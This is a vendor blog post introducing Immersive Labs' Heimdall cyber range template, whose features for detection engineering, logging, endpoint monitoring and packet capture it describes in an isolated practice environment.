Cybersecurity threats have become increasingly sophisticated, and detecting and responding to them requires constant innovation and training. We released a new template called Heimdall for use on our Tailored Cyber Ranges to meet this need. This template is designed to help organizations perform Detection Engineering, IOC Collection, and Analysis. Let’s dive into the features and benefits of this range template.https://www.immersivelabs.com/wp-content/uploads/2023/04/1682358662265.pngFeatures of the Heimdall Cyber Range TemplateThe Heimdall template is a lightweight, feature-packed custom cyber range template. The template design meets the needs of cybersecurity professionals who want to conduct critical cyber research. Key features include:
- Small Domain: A small domain with a domain controller and two connected hosts lets you focus on the individual components at test. Reducing the size of the range reduces the amount of noise in logs and traffic, allowing analysts to focus on collecting data related to the research while being flexible enough to mimic enterprise configurations.
- Expandable and Configurable: Within the ranges dashboard, you can access all the hosts and deploy additional instances into the range to match any specific requirements.
- SIEM: Elasticsearch (search and analytics) and Kibana (data visualization) are deployed into the range with a host of logs being collected from the domain controller and connected hosts, including core Windows events, Sysmon, OSQuery, and Packetbeat collectors.
- Fleet: Alongside the Elastic stack, a small Fleet instance is provided that allows for management of the SIEM and deployment of additional collectors across the range quickly and easily
- Velociraptor: For EDR-like capabilities, including endpoint security, Yara scanning, threat hunting, and forensics analysis, Velociraptor is installed and configured on all Windows hosts.
- Full Packet Capture with TLS Secrets: Full packet capture is a feature that captures network traffic. All traffic on the ethernet port for Windows hosts is collected and stored in a central file. Alongside the PCAP files, TLS secrets are collected, allowing for on-the-fly TLS and HTTPS traffic decryption.
- Analyst Machines: A set of three analyst machines are provided to enable attack emulation (Kali) or malware and forensics analysis on Windows or Linux hosts that come with some standard analysis tools.
Benefits of the Heimdall Cyber Range TemplateThe Heimdall cyber range template offers several benefits to users:
- Isolated Environments: The template is purpose-built to help organizations safely work with the latest attacker toolsets and TTPS without impacting corporate networks and infrastructure.
- Detection Engineering: Analyzing malware or TTPS to generate SIEM or network rules often requires specialist setup and configuration. With Heimdall, this configuration is ready on-demand, letting your teams focus on the analysis and rule creation rather than managing and maintaining infrastructure.
- Rapid Response to Emerging Threats: Having an environment ready to review new malware and TTPS means network defenders can more quickly test and validate publicly shared IoCs before deploying them to production environments, helping reduce risk and improve overall security posture.
Now that You’ve been Properly IntroducedThe Heimdall template is a valuable addition to any organization using Immersive Labs Cyber Ranges. With features like event logging, endpoint security, full packet capture, and TLS Inspection, this range template enables organizations to efficiently perform detection engineering against the latest attacker tools, techniques, and methods. Organizations can use the template to improve their cybersecurity posture and continuously advance their response times and techniques to help reduce the risk of a cyber attack. Immersive Labs Cyber Ranges enable organizations to build customizable environments to simulate target networks or other advanced cyber readiness activities. Available on-demand when you need them, you can create sophisticated ranges in hours – instead of days – with minimal maintenance.Go HERE to learn more about Immersive Labs Cyber Ranges.